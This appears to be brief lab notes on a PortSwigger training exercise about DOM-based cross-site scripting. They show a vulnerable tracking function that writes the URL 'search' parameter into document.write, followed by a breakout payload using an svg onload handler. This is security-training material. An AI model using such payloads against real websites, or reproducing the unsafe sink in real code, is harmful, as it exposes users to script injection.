DOM XSS in document.write sink using source location.search
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

test_payload


Last updated
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

test_payload


Last updated
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms=' + query + '">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if (query) {
trackSearch(query);
}"><svg onload=alert(1)>